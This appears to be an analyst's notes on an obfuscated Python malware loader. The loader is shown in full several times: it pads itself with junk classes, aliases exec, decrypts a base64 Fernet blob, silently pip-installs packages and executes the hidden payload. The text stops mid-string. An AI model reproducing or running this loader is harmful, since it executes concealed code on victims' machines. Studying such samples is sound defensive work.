encoded_code = "Z0FBQUFBQm0wdFVtRkJ6dThsYzV5QkZvTnRQQ3hERHBqak5IYVdDVFBKX245Q1VZRHVFVjF6TkFOTjdVTFkycW5yZUROREpLbEtlS21GT2o3RTJ3SDZFUFNVMVItQmlLZW5IeDcxTVM5c25qWEo3Szg4TEg4ajVQRk9PRXJ5RWh0ZEN3WGdOYkRTQzY4b1VianpyOHR5UnN0NDhMQUVhVzB1ZjZiSXJGaG1oYUs4SnU2c0J0SjJNd25xR1k3YU9sR3lVc3lvcU5SZWRXVFFVYVNyalRwblA0U21OSDE1VUh0bVpvako3R293ZDJNa09yaEc2MzUtQWhncHhCQzl1Z3VORFFrVXUzNkFmOVNXc1RnNE15VXRNbzRwXzVnREZtZUFLN09SM3E3Y29iVnViWEhmM0tOams2ZG95ZnJhbkJLbnRnMTZmbmROanM4WXVCbFBNMy1qc0FXVGZXZnZTZGduUkNqSWdWLU9FUXdha0Q0dFdGMXRfbXFhdmdZbDNXNmFsMXhnbHhrV3E5bFk3dXNBS0tnVm1hUmM2cTBqOWR4dW1ZM0pmVnRXcjRWTnJVRGd2dVlGbGFuZmx2VGxlemxfSzNVNVVxbElHd04zbFVxOEpYX29iM1JqQUpjU19oZ19LMlhYcDY2QURtVHlLOXRDSlBJS1BubWsyelFhZ3pOLU9RR0pIaU50bW12d2VIQ3p0MzdZSXctYlBRMW40TERaVGNsbmVCMW5HWVFYWnY1b0kzTWdPUU4wc3Z4dkNPSENXOTRsTVdxX1hUektRcGtqeWw5eG94c0k2OGVYeDVRdXhUbVEwZzNDckg3dU9SMkRpZ2VSUmpVQkZPWmcxclVaQXRVMmlJdUFqVy1FNUtlRmFEYWdTRElXVUhNOHNLQl9XbE9fTE1XYkFNdHNEcVhscm1vVzQzS1Qycm0yckZHQ0owNTJraG04U1pMN1VNLXM2aDl0NmU0Q2laSmo5NnViRGhPUkM5RldHN2hTd2d6dFMweS10aEpHZW5KMkJfRGVGdHFmVUxNUm1FR0VWRXVJcnI4bVNadFRuU0psVzl4RXpWZEhkamZSb29nUUhFbkZtZVNUc295TXNYd2F6OUV1eThZMER3MjJlMHVkaTVPV0lqTTEyeEx6ZmVKU2thdXZCQ3VMU0hjckNUYTUxZ3ZVZXRZQndxWmY5WkZoSGtWb3MxMEstZ2ZtVktjY2lHalloT0gzeC1JbU5FNTF2SEpJd3NyX0JlcURFZ2V0Y1NDVFp4Mzl6ZDNkalFHVkl3TzdkT2F0eUhGTWwwbGhhY0RsYTBJU1gwVHNuV0lhMnhUQXl1ekRuWmQ4ZGZ5V2xicG1Sa1dGOGNwZDZ4Q1JrNDZRVDBGOFFqbVpKbjBlcGtwQkxRQnEwdHJPWWxGVlpBYVRTTjE1aTBRXzBYaWFsR2M5RlZPY24tYUFsTHJEOXZPOFc0OGY4RDhCZGZYemdqOGdZdTNoQ3NlTW1uY2RMOG9uUnVmT1hYUERCSmdLZ3R0TUJFbUhER1FLd2Y5UklIVHdjNHVoaDdWbnBqRW9SX1FPV2xFdWJsOExLVEtfai1rYmdWZjF3N0QwN01xcVVYUkZCU0JudlA3UVF6Q0U0V255OU1FU0lGRmFwQjhFWXpoSmpTYmF3VnNRR1N5QTlwck5veEtjTDFWLTlKbFU1QjF4RThDYkJ6MUJRY1NBN1F2OVI5T20yWXVsVkM1QmQ0Y0JRcWVZNDJZcFBOcVd1djlhXzJUQWJ2RXlBS2JqU0NEYjJSUHlKM0pPWDVfNXdhWkNFaU1GWU9BZ2tCTDRpTTB1SnJJa01Bdm9heXowVVhEaFI0Rm92ZW9EMWY4WGJIZElXNUcweEVqZEc0clFZNTFpRWNkT2tGRTRSc1dJR21TM3ptS1N1bWR6TnN6Q0k5NV9oVkU1bHlfZlJVWmktRzB4bWxad2xCWmRlMy1tUE9WbnhBVnp4RWtPc1llMVo3dzdpcnFaMzBNMUJIdWR4am9mWERldXVGaWJuUkF2YUgzZUs2TEtaS3VlYXVvLUpNd0MyU0NTOUViZDVfYWIyS1V2MDAwTGlyQ2FnT1dabVNMUEpDUklFdW1DRDBocmR6UFN5bk5jRWpnV2RDZ2ZrSHdaRXh2ZTBQZ2Iwb3VsTW1Vb2VyTzhsblJiYi0yT2Jwa2ZfVUU3OWduOVZOUG1SSnNUTXZVVmZ1VEFDM2xUajFGUGh4cnZITDJHSnFYMUxVVl91cHdmUnFfNGhzSFM2bDVWWl92aTZPTktxTWhLM1pvTFBWSUJOYjJ5MFRJc25BQ3g0dzByLXllU0VrOGFiT05DMU02UUk3Z0R4alBUUGFDWmhwanhkMUpiZmVJSHMwZFhqWk84SUcxaHFmT3RES3Vxb180VUtrZTducTMtRUVFd01pbVBYYklNU0U3N25BVC1penJDOGtDaDd3TXMzaS1fRFVlS29wMHdUZGZYcWFGU2d6SDBzSDZVLUEyUFZ5YVYyZWxONU9fZXJWZ28xSVhHMmU5cUhWdndaanNJVFFoZ1UtQ3RVdHd4aDVLT3diNGpzbE84VXRONDNQSWRaUG9yb0Y5TTA2eUx0dFlNS3FjMWpwcG54YVdiU0hzWm9TM3k0SHpGMnBtX21vTmREOF9iSjd5RGs0bm5Pb0pIMjB3OGlxTzBaMGlUWmljNnRldkRYSnRMbjIwWVo4ek5WX3NPakhZNG04QVVwM29oLWN2c1lUeE5DVFhrRVNRWkp0bkk1S0JGMGZfU1pNT1ZZWWh1ekNzRkZORno2bG5fUHMyajFwV3ROUUdRd2lRQ0trWVNOZmxhU0hxUnBzOXlIQ0pRTmdnZ2ZqTXV3MmV5cVo5ckM0WEhnNXhlSVg0Y2ladS1DWVVjNnRDUlJVbnBrVVNrR09hNmNmVkp3S1l1WEZkNUpaOWZvT2hlUXg5cE5lSDhUd2xoMW9yUnVIVkdUWE5NNGE3d0ROVmdpd0N6OVZaWkRrcXRrbXBBazA4NVJNV29lWk5pQlY5ZEJ5Z2gtMXhlanB6RFl2Y1lWZDJZdXhCdUZYZjRhTnFxZlNUeTBVY1A3MkM2R09vbmVzVTYwMkJDdUtvNUtuZXFwcXBaQlZKdExhaGZjTkIzNG9kdGowRXhWM0xfN1VWZlJxc2hJcEswdnRoeWtTaVZQaUR4dllKTXM4Um5IcGsyUDd5SUVQMk1MNTd1TzZYVkVXUjhUdzFUU1Q3ZFlKVXBVbS1BY2FHY1RSdXRiQjV1ajVDQ0k4ZWViYnRWZlhmNGJWdEx6U096SG1tbXNEbXRsMkFMdkVsYUFwYjh0WXREelZSYTY3UEwzUWVaaHJ0TEUzTUtpVHZ4bTJ2MzNKeXZxZjhKOFRGT3AzYTluSDZ2NS1WdzZLLUxuVGtRZzh4ckFBUnNHNDZDa1k0bHJfMGQtN19OZjJWWVJGeF9WLUtQd25lVnZjZVozWTR2Q3hvRkQyay1idWc0eWVacXRFY0hsQlM4RXhGT1hJbklVd0JWQ3JCcS05aU1BdFR6ekt5eGRTcXQzbExhdEpDM2hmMWpNLUFiZEhrNndtRzc5MG1EdzhZalFYLVMxaC0yT1VxaXc4QjUzWmY4SzBPektSSUxELXk2QjFxdzNTcDczam1zdktLQ3E4UTQzTTVTSGRRMTg4WUVTWXpiRUl4SnJOcFRRcFJvOHVJVkdvd2dfYWNscjBTRTZJOG5XanJSV0VnMUFxdXdNd21zWVpVSE5FWGtEZVBjOGlnVW1EQ2QwQlhhMWV0eEFPREZwekJLVzEtOGNTbURkNDMtMTJ5a0RsazRuU2lrREswX0lLUWlMRXNQY3c5Ym83SmYxbktFQmNya1ZyNmF6d1YyeV9TaXVObTl0WTFQOUxsSlBtMkVJZ2h1a0MxS00yUXhENnd1dl93bk5qcGw4cFEybGJHRE1SRWp2ODN4dWM1dVBJWC1yUmN1ZTBuems4ZGI2RXZla0N2R0RlTnNCUUtkREJ1XzZPYy1NdEUtQ2gyeElwSHpqV0k2RGU3MWg5QXVsQ3NmbFo3TXFsdXlkaE02RHRKdE0tWmExT2Vrak9uUmxmX2M5NkJiNUlGa3JGMGMxMVk1VExUT0Z0U0FjT2RlV0ZMNHpWNDZiSEo2N1NaY1RQMzVjakdFcE1DamNFcUFhdlhVaGJwM2xIQUhPMi1aRU41Rk9sY3RPamtaNFJnaGgyNmg0RXpDR0k0WDV3VzdReEowQ0MzSHZNS0ZNdVNqVjZNeE1qR1lCeTFKYzJXenpaOG8xSFlJYjRLTjRTMFNtUzUzSFU5Q1I1YmNZLUpnSXBYNVJzMU04NklhS210S3hfSTFkVjlJMGZzQ1RGaXViaDFFaU5FMWUy"
CSelYFNpYAX4jhfMiUEQGWQ3MocchTDMzojPWD = exec
encrypted_code = base64.b64decode(encoded_code)
{'username': 'szeCjxa', 'age': 24}
OK5zprOJHG = 55875859
class eGlaSLUWdF:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class RFsrZQdtWQ:
def __init__(self):
self.data = False
def get_data(self):
return self.data
Ti2X7Y521E = 23600745
AbJDmG9B8u = 19935358
class sdAkUQ8cHT:
def __init__(self):
self.data = False
def get_data(self):
return self.data
["'gfHaYdafEZ'", "'y2RxfvuMW0'", "'WCTAxbZnDZ'", "'DX6NVPr1pS'", "'pE9f8wxhlJ'"]
class obNoDtjRx3:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class PVULTzh89a:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class mrKidpjicw:
def __init__(self):
self.data = False
def get_data(self):
return self.data
xV478jUQBt = 23747526
class S552uX8Ils:
def __init__(self):
self.data = True
def get_data(self):
return self.data
x6QyQTY4CA = 7831170
class wDoABzZQ4y:
def __init__(self):
self.data = True
def get_data(self):
return self.data
ZJjaMzyYmj = 33497629
Qrg2AcEK18 = 11190430
class kI2POOmnZ6:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class OmlcDYMjeK:
def __init__(self):
self.data = True
def get_data(self):
return self.data
'hUco2bSSX3'
QstHDmbB2e = 29478657
veJaLeXaTg = 86145784
ycS6diVEVI = 61119508
s = [b'zTskoYGm68VrSiOM6J9W0PqyKTfSyraM0NydVmJvM_k=', b'pcD23bRQTL1MqLS84NdPsiPdYJlwbTaal6JmulzTq4k=', b'9EBQNDjmy0rGXCbVgVnrgFFsAHk4Ye1M8y1GSIx9CPY=', b'663RnK5l0MQzewfpAQfYhJbL3p7ZRoR-j7I3DkXiUIk=', b'I5Arxkgfo2E56VBVctFjJ-pFkeBbQg6QXMuG-gNgqq4=', b'eXP1sKfkTE9PNkWR8rA9jzJqun80yMYPrzMMi65JQpw=', b'56S9Sv7zUPL71w6N2OTSwxvFl_a-5zvsN6rxQI97UWU=', b'gZcRMaVftMg_F9E4tNQ_etAR7_PKT_vVfWwWkMSxDQc=', b'-XmaKL4uo4p0gM5ARQZtxjZ_5ecK1w53AEkWuiWDIzQ=', b'ikNfBtrrX-9EBI3iKzWnBJW5wNNvi8rM4oT9BLqDJNw=', b'uEikHaHAX1B20aB_bcQwUA0aO21Ai-rgYAqGfKxHKJA=', b'deoHTwNvwTOuQjoy5oh9jN_ZQlLbVCvwI47D3sQt8UA=', b'xuaD7BqwreniKZAvBO38MO250oO40HXboxhU8--6YQ0=', b'X5GfY_zukIDPKxyzmMYFkps-Av8Ao2TQDPmckrjb3ZQ=', b'CAOD7XSW4e-ON33uz5_8h6RZhorDlKg798e1RcEYSlo=', b'dMphwlwO6Qh_FCdbMzseoZsWkQWPFtGx8VSiFAN2SSo=', b'q4NfcRieLIKnyBwFEhUxZcR_8A3BFS_n_cIE8sFX8a4=', b'hLfAPR06xuo545qJlzlYko5f9KKuXOBrCBNgzruTV14=']
for key in s:
try:
decrypted_code = hXRGDGCPTrRvbzwaUlFbmQCoD8OCY4rjYCOxN5(key.decode("utf-8")).decrypt(encrypted_code)
break
except Exception as e:
pass
{'username': 'szeCjxa', 'age': 24}
OK5zprOJHG = 55875859
class eGlaSLUWdF:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class RFsrZQdtWQ:
def __init__(self):
self.data = False
def get_data(self):
return self.data
Ti2X7Y521E = 23600745
AbJDmG9B8u = 19935358
class sdAkUQ8cHT:
def __init__(self):
self.data = False
def get_data(self):
return self.data
["'gfHaYdafEZ'", "'y2RxfvuMW0'", "'WCTAxbZnDZ'", "'DX6NVPr1pS'", "'pE9f8wxhlJ'"]
class obNoDtjRx3:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class PVULTzh89a:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class mrKidpjicw:
def __init__(self):
self.data = False
def get_data(self):
return self.data
xV478jUQBt = 23747526
class S552uX8Ils:
def __init__(self):
self.data = True
def get_data(self):
return self.data
x6QyQTY4CA = 7831170
class wDoABzZQ4y:
def __init__(self):
self.data = True
def get_data(self):
return self.data
ZJjaMzyYmj = 33497629
Qrg2AcEK18 = 11190430
class kI2POOmnZ6:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class OmlcDYMjeK:
def __init__(self):
self.data = True
def get_data(self):
return self.data
'hUco2bSSX3'
QstHDmbB2e = 29478657
veJaLeXaTg = 86145784
ycS6diVEVI = 61119508
decompressed_code = zlib.decompress(decrypted_code).decode('utf-8')
CSelYFNpYAX4jhfMiUEQGWQ3MocchTDMzojPWD(decompressed_code)
{'username': 'szeCjxa', 'age': 24}
OK5zprOJHG = 55875859
class eGlaSLUWdF:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class RFsrZQdtWQ:
def __init__(self):
self.data = False
def get_data(self):
return self.data
Ti2X7Y521E = 23600745
AbJDmG9B8u = 19935358
class sdAkUQ8cHT:
def __init__(self):
self.data = False
def get_data(self):
return self.data
["'gfHaYdafEZ'", "'y2RxfvuMW0'", "'WCTAxbZnDZ'", "'DX6NVPr1pS'", "'pE9f8wxhlJ'"]
class obNoDtjRx3:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class PVULTzh89a:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class mrKidpjicw:
def __init__(self):
self.data = False
def get_data(self):
return self.data
xV478jUQBt = 23747526
class S552uX8Ils:
def __init__(self):
self.data = True
def get_data(self):
return self.data
x6QyQTY4CA = 7831170
class wDoABzZQ4y:
def __init__(self):
self.data = True
def get_data(self):
return self.data
ZJjaMzyYmj = 33497629
Qrg2AcEK18 = 11190430
class kI2POOmnZ6:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class OmlcDYMjeK:
def __init__(self):
self.data = True
def get_data(self):
return self.data
'hUco2bSSX3'
QstHDmbB2e = 29478657
veJaLeXaTg = 86145784
ycS6diVEVI = 61119508
With this payload, obfuscation method is still same with the first case, so I will note the final result here:
import time
from sys import executable, stderr
try:
import cryptography
except ImportError:
subprocess.run('python -m pip install cryptography', shell=True)
from cryptography.fernet import Fernet
import subprocess
from importlib import import_module
requirements = [
["requests", "requests"],
["Cryptodome.Cipher", "pycryptodomex" if not 'PythonSoftwareFoundation' in executable else 'pycryptodome']
]
for modl in requirements:
try:
import_module(module[0])
except:
subprocess.Popen(executable + " -m pip install " +modl[1], shell=True)
time.sleep(3)
import requests
from cryptography.fernet import Fernet as hXRGDGCPTrRvbzwaUlFbmQCoD8OCY4rjYCOxN5
try:
from Cryptodome.Cipher import AES
except:
subprocess.Popen(executable + " -m pip install pycryptodome ", shell=True)
from Crypto.Cipher import AES
encoded_code = "Z0FBQUFBQm0wdFVtRkJ6dThsYzV5QkZvTnRQQ3hERHBqak5IYVdDVFBKX245Q1VZRHVFVjF6TkFOTjdVTFkycW5yZUROREpLbEtlS21GT2o3RTJ3SDZFUFNVMVItQmlLZW5IeDcxTVM5c25qWEo3Szg4TEg4ajVQRk9PRXJ5RWh0ZEN3WGdOYkRTQzY4b1VianpyOHR5UnN0NDhMQUVhVzB1ZjZiSXJGaG1oYUs4SnU2c0J0SjJNd25xR1k3YU9sR3lVc3lvcU5SZWRXVFFVYVNyalRwblA0U21OSDE1VUh0bVpvako3R293ZDJNa09yaEc2MzUtQWhncHhCQzl1Z3VORFFrVXUzNkFmOVNXc1RnNE15VXRNbzRwXzVnREZtZUFLN09SM3E3Y29iVnViWEhmM0tOams2ZG95ZnJhbkJLbnRnMTZmbmROanM4WXVCbFBNMy1qc0FXVGZXZnZTZGduUkNqSWdWLU9FUXdha0Q0dFdGMXRfbXFhdmdZbDNXNmFsMXhnbHhrV3E5bFk3dXNBS0tnVm1hUmM2cTBqOWR4dW1ZM0pmVnRXcjRWTnJVRGd2dVlGbGFuZmx2VGxlemxfSzNVNVVxbElHd04zbFVxOEpYX29iM1JqQUpjU19oZ19LMlhYcDY2QURtVHlLOXRDSlBJS1BubWsyelFhZ3pOLU9RR0pIaU50bW12d2VIQ3p0MzdZSXctYlBRMW40TERaVGNsbmVCMW5HWVFYWnY1b0kzTWdPUU4wc3Z4dkNPSENXOTRsTVdxX1hUektRcGtqeWw5eG94c0k2OGVYeDVRdXhUbVEwZzNDckg3dU9SMkRpZ2VSUmpVQkZPWmcxclVaQXRVMmlJdUFqVy1FNUtlRmFEYWdTRElXVUhNOHNLQl9XbE9fTE1XYkFNdHNEcVhscm1vVzQzS1Qycm0yckZHQ0owNTJraG04U1pMN1VNLXM2aDl0NmU0Q2laSmo5NnViRGhPUkM5RldHN2hTd2d6dFMweS10aEpHZW5KMkJfRGVGdHFmVUxNUm1FR0VWRXVJcnI4bVNadFRuU0psVzl4RXpWZEhkamZSb29nUUhFbkZtZVNUc295TXNYd2F6OUV1eThZMER3MjJlMHVkaTVPV0lqTTEyeEx6ZmVKU2thdXZCQ3VMU0hjckNUYTUxZ3ZVZXRZQndxWmY5WkZoSGtWb3MxMEstZ2ZtVktjY2lHalloT0gzeC1JbU5FNTF2SEpJd3NyX0JlcURFZ2V0Y1NDVFp4Mzl6ZDNkalFHVkl3TzdkT2F0eUhGTWwwbGhhY0RsYTBJU1gwVHNuV0lhMnhUQXl1ekRuWmQ4ZGZ5V2xicG1Sa1dGOGNwZDZ4Q1JrNDZRVDBGOFFqbVpKbjBlcGtwQkxRQnEwdHJPWWxGVlpBYVRTTjE1aTBRXzBYaWFsR2M5RlZPY24tYUFsTHJEOXZPOFc0OGY4RDhCZGZYemdqOGdZdTNoQ3NlTW1uY2RMOG9uUnVmT1hYUERCSmdLZ3R0TUJFbUhER1FLd2Y5UklIVHdjNHVoaDdWbnBqRW9SX1FPV2xFdWJsOExLVEtfai1rYmdWZjF3N0QwN01xcVVYUkZCU0JudlA3UVF6Q0U0V255OU1FU0lGRmFwQjhFWXpoSmpTYmF3VnNRR1N5QTlwck5veEtjTDFWLTlKbFU1QjF4RThDYkJ6MUJRY1NBN1F2OVI5T20yWXVsVkM1QmQ0Y0JRcWVZNDJZcFBOcVd1djlhXzJUQWJ2RXlBS2JqU0NEYjJSUHlKM0pPWDVfNXdhWkNFaU1GWU9BZ2tCTDRpTTB1SnJJa01Bdm9heXowVVhEaFI0Rm92ZW9EMWY4WGJIZElXNUcweEVqZEc0clFZNTFpRWNkT2tGRTRSc1dJR21TM3ptS1N1bWR6TnN6Q0k5NV9oVkU1bHlfZlJVWmktRzB4bWxad2xCWmRlMy1tUE9WbnhBVnp4RWtPc1llMVo3dzdpcnFaMzBNMUJIdWR4am9mWERldXVGaWJuUkF2YUgzZUs2TEtaS3VlYXVvLUpNd0MyU0NTOUViZDVfYWIyS1V2MDAwTGlyQ2FnT1dabVNMUEpDUklFdW1DRDBocmR6UFN5bk5jRWpnV2RDZ2ZrSHdaRXh2ZTBQZ2Iwb3VsTW1Vb2VyTzhsblJiYi0yT2Jwa2ZfVUU3OWduOVZOUG1SSnNUTXZVVmZ1VEFDM2xUajFGUGh4cnZITDJHSnFYMUxVVl91cHdmUnFfNGhzSFM2bDVWWl92aTZPTktxTWhLM1pvTFBWSUJOYjJ5MFRJc25BQ3g0dzByLXllU0VrOGFiT05DMU02UUk3Z0R4alBUUGFDWmhwanhkMUpiZmVJSHMwZFhqWk84SUcxaHFmT3RES3Vxb180VUtrZTducTMtRUVFd01pbVBYYklNU0U3N25BVC1penJDOGtDaDd3TXMzaS1fRFVlS29wMHdUZGZYcWFGU2d6SDBzSDZVLUEyUFZ5YVYyZWxONU9fZXJWZ28xSVhHMmU5cUhWdndaanNJVFFoZ1UtQ3RVdHd4aDVLT3diNGpzbE84VXRONDNQSWRaUG9yb0Y5TTA2eUx0dFlNS3FjMWpwcG54YVdiU0hzWm9TM3k0SHpGMnBtX21vTmREOF9iSjd5RGs0bm5Pb0pIMjB3OGlxTzBaMGlUWmljNnRldkRYSnRMbjIwWVo4ek5WX3NPakhZNG04QVVwM29oLWN2c1lUeE5DVFhrRVNRWkp0bkk1S0JGMGZfU1pNT1ZZWWh1ekNzRkZORno2bG5fUHMyajFwV3ROUUdRd2lRQ0trWVNOZmxhU0hxUnBzOXlIQ0pRTmdnZ2ZqTXV3MmV5cVo5ckM0WEhnNXhlSVg0Y2ladS1DWVVjNnRDUlJVbnBrVVNrR09hNmNmVkp3S1l1WEZkNUpaOWZvT2hlUXg5cE5lSDhUd2xoMW9yUnVIVkdUWE5NNGE3d0ROVmdpd0N6OVZaWkRrcXRrbXBBazA4NVJNV29lWk5pQlY5ZEJ5Z2gtMXhlanB6RFl2Y1lWZDJZdXhCdUZYZjRhTnFxZlNUeTBVY1A3MkM2R09vbmVzVTYwMkJDdUtvNUtuZXFwcXBaQlZKdExhaGZjTkIzNG9kdGowRXhWM0xfN1VWZlJxc2hJcEswdnRoeWtTaVZQaUR4dllKTXM4Um5IcGsyUDd5SUVQMk1MNTd1TzZYVkVXUjhUdzFUU1Q3ZFlKVXBVbS1BY2FHY1RSdXRiQjV1ajVDQ0k4ZWViYnRWZlhmNGJWdEx6U096SG1tbXNEbXRsMkFMdkVsYUFwYjh0WXREelZSYTY3UEwzUWVaaHJ0TEUzTUtpVHZ4bTJ2MzNKeXZxZjhKOFRGT3AzYTluSDZ2NS1WdzZLLUxuVGtRZzh4ckFBUnNHNDZDa1k0bHJfMGQtN19OZjJWWVJGeF9WLUtQd25lVnZjZVozWTR2Q3hvRkQyay1idWc0eWVacXRFY0hsQlM4RXhGT1hJbklVd0JWQ3JCcS05aU1BdFR6ekt5eGRTcXQzbExhdEpDM2hmMWpNLUFiZEhrNndtRzc5MG1EdzhZalFYLVMxaC0yT1VxaXc4QjUzWmY4SzBPektSSUxELXk2QjFxdzNTcDczam1zdktLQ3E4UTQzTTVTSGRRMTg4WUVTWXpiRUl4SnJOcFRRcFJvOHVJVkdvd2dfYWNscjBTRTZJOG5XanJSV0VnMUFxdXdNd21zWVpVSE5FWGtEZVBjOGlnVW1EQ2QwQlhhMWV0eEFPREZwekJLVzEtOGNTbURkNDMtMTJ5a0RsazRuU2lrREswX0lLUWlMRXNQY3c5Ym83SmYxbktFQmNya1ZyNmF6d1YyeV9TaXVObTl0WTFQOUxsSlBtMkVJZ2h1a0MxS00yUXhENnd1dl93bk5qcGw4cFEybGJHRE1SRWp2ODN4dWM1dVBJWC1yUmN1ZTBuems4ZGI2RXZla0N2R0RlTnNCUUtkREJ1XzZPYy1NdEUtQ2gyeElwSHpqV0k2RGU3MWg5QXVsQ3NmbFo3TXFsdXlkaE02RHRKdE0tWmExT2Vrak9uUmxmX2M5NkJiNUlGa3JGMGMxMVk1VExUT0Z0U0FjT2RlV0ZMNHpWNDZiSEo2N1NaY1RQMzVjakdFcE1DamNFcUFhdlhVaGJwM2xIQUhPMi1aRU41Rk9sY3RPamtaNFJnaGgyNmg0RXpDR0k0WDV3VzdReEowQ0MzSHZNS0ZNdVNqVjZNeE1qR1lCeTFKYzJXenpaOG8xSFlJYjRLTjRTMFNtUzUzSFU5Q1I1YmNZLUpnSXBYNVJzMU04NklhS210S3hfSTFkVjlJMGZzQ1RGaXViaDFFaU5FMWUy"
CSelYFNpYAX4jhfMiUEQGWQ3MocchTDMzojPWD = exec
encrypted_code = base64.b64decode(encoded_code)
s = [b'zTskoYGm68VrSiOM6J9W0PqyKTfSyraM0NydVmJvM_k=', b'pcD23bRQTL1MqLS84NdPsiPdYJlwbTaal6JmulzTq4k=', b'9EBQNDjmy0rGXCbVgVnrgFFsAHk4Ye1M8y1GSIx9CPY=', b'663RnK5l0MQzewfpAQfYhJbL3p7ZRoR-j7I3DkXiUIk=', b'I5Arxkgfo2E56VBVctFjJ-pFkeBbQg6QXMuG-gNgqq4=', b'eXP1sKfkTE9PNkWR8rA9jzJqun80yMYPrzMMi65JQpw=', b'56S9Sv7zUPL71w6N2OTSwxvFl_a-5zvsN6rxQI97UWU=', b'gZcRMaVftMg_F9E4tNQ_etAR7_PKT_vVfWwWkMSxDQc=', b'-XmaKL4uo4p0gM5ARQZtxjZ_5ecK1w53AEkWuiWDIzQ=', b'ikNfBtrrX-9EBI3iKzWnBJW5wNNvi8rM4oT9BLqDJNw=', b'uEikHaHAX1B20aB_bcQwUA0aO21Ai-rgYAqGfKxHKJA=', b'deoHTwNvwTOuQjoy5oh9jN_ZQlLbVCvwI47D3sQt8UA=', b'xuaD7BqwreniKZAvBO38MO250oO40HXboxhU8--6YQ0=', b'X5GfY_zukIDPKxyzmMYFkps-Av8Ao2TQDPmckrjb3ZQ=', b'CAOD7XSW4e-ON33uz5_8h6RZhorDlKg798e1RcEYSlo=', b'dMphwlwO6Qh_FCdbMzseoZsWkQWPFtGx8VSiFAN2SSo=', b'q4NfcRieLIKnyBwFEhUxZcR_8A3BFS_n_cIE8sFX8a4=', b'hLfAPR06xuo545qJlzlYko5f9KKuXOBrCBNgzruTV14=']
for key in s:
try:
decrypted_code = hXRGDGCPTrRvbzwaUlFbmQCoD8OCY4rjYCOxN5(key.decode("utf-8")).decrypt(encrypted_code)
break
except Exception as e:
pass
decompressed_code = zlib.decompress(decrypted_code).decode('utf-8')
CSelYFNpYAX4jhfMiUEQGWQ3MocchTDMzojPWD(decompressed_code)
In this code, it will decode base64 string, and then using Fernet with array s is the key to decrypt. From that I modified code to make it print the content:
import base64
from cryptography.fernet import Fernet as hXRGDGCPTrRvbzwaUlFbmQCoD8OCY4rjYCOxN5
import zlib
encoded_code = "Z0FBQUFBQm0wdFVtRkJ6dThsYzV5QkZvTnRQQ3hERHBqak5IYVdDVFBKX245Q1VZRHVFVjF6TkFOTjdVTFkycW5yZUROREpLbEtlS21GT2o3RTJ3SDZFUFNVMVItQmlLZW5IeDcxTVM5c25qWEo3Szg4TEg4ajVQRk9PRXJ5RWh0ZEN3WGdOYkRTQzY4b1VianpyOHR5UnN0NDhMQUVhVzB1ZjZiSXJGaG1oYUs4SnU2c0J0SjJNd25xR1k3YU9sR3lVc3lvcU5SZWRXVFFVYVNyalRwblA0U21OSDE1VUh0bVpvako3R293ZDJNa09yaEc2MzUtQWhncHhCQzl1Z3VORFFrVXUzNkFmOVNXc1RnNE15VXRNbzRwXzVnREZtZUFLN09SM3E3Y29iVnViWEhmM0tOams2ZG95ZnJhbkJLbnRnMTZmbmROanM4WXVCbFBNMy1qc0FXVGZXZnZTZGduUkNqSWdWLU9FUXdha0Q0dFdGMXRfbXFhdmdZbDNXNmFsMXhnbHhrV3E5bFk3dXNBS0tnVm1hUmM2cTBqOWR4dW1ZM0pmVnRXcjRWTnJVRGd2dVlGbGFuZmx2VGxlemxfSzNVNVVxbElHd04zbFVxOEpYX29iM1JqQUpjU19oZ19LMlhYcDY2QURtVHlLOXRDSlBJS1BubWsyelFhZ3pOLU9RR0pIaU50bW12d2VIQ3p0MzdZSXctYlBRMW40TERaVGNsbmVCMW5HWVFYWnY1b0kzTWdPUU4wc3Z4dkNPSENXOTRsTVdxX1hUektRcGtqeWw5eG94c0k2OGVYeDVRdXhUbVEwZzNDckg3dU9SMkRpZ2VSUmpVQkZPWmcxclVaQXRVMmlJdUFqVy1FNUtlRmFEYWdTRElXVUhNOHNLQl9XbE9fTE1XYkFNdHNEcVhscm1vVzQzS1Qycm0yckZHQ0owNTJraG04U1pMN1VNLXM2aDl0NmU0Q2laSmo5NnViRGhPUkM5RldHN2hTd2d6dFMweS10aEpHZW5KMkJfRGVGdHFmVUxNUm1FR0VWRXVJcnI4bVNadFRuU0psVzl4RXpWZEhkamZSb29nUUhFbkZtZVNUc295TXNYd2F6OUV1eThZMER3MjJlMHVkaTVPV0lqTTEyeEx6ZmVKU2thdXZCQ3VMU0hjckNUYTUxZ3ZVZXRZQndxWmY5WkZoSGtWb3MxMEstZ2ZtVktjY2lHalloT0gzeC1JbU5FNTF2SEpJd3NyX0JlcURFZ2V0Y1NDVFp4Mzl6ZDNkalFHVkl3TzdkT2F0eUhGTWwwbGhhY0RsYTBJU1gwVHNuV0lhMnhUQXl1ekRuWmQ4ZGZ5V2xicG1Sa1dGOGNwZDZ4Q1JrNDZRVDBGOFFqbVpKbjBlcGtwQkxRQnEwdHJPWWxGVlpBYVRTTjE1aTBRXzBYaWFsR2M5RlZPY24tYUFsTHJEOXZPOFc0OGY4RDhCZGZYemdqOGdZdTNoQ3NlTW1uY2RMOG9uUnVmT1hYUERCSmdLZ3R0TUJFbUhER1FLd2Y5UklIVHdjNHVoaDdWbnBqRW9SX1FPV2xFdWJsOExLVEtfai1rYmdWZjF3N0QwN01xcVVYUkZCU0JudlA3UVF6Q0U0V255OU1FU0lGRmFwQjhFWXpoSmpTYmF3VnNRR1N5QTlwck5veEtjTDFWLTlKbFU1QjF4RThDYkJ6MUJRY1NBN1F2OVI5T20yWXVsVkM1QmQ0Y0JRcWVZNDJZcFBOcVd1djlhXzJUQWJ2RXlBS2JqU0NEYjJSUHlKM0pPWDVfNXdhWkNFaU1GWU9BZ2tCTDRpTTB1SnJJa01Bdm9heXowVVhEaFI0Rm92ZW9EMWY4WGJIZElXNUcweEVqZEc0clFZNTFpRWNkT2tGRTRSc1dJR21TM3ptS1N1bWR6TnN6Q0k5NV9oVkU1bHlfZlJVWmktRzB4bWxad2xCWmRlMy1tUE9WbnhBVnp4RWtPc1llMVo3dzdpcnFaMzBNMUJIdWR4am9mWERldX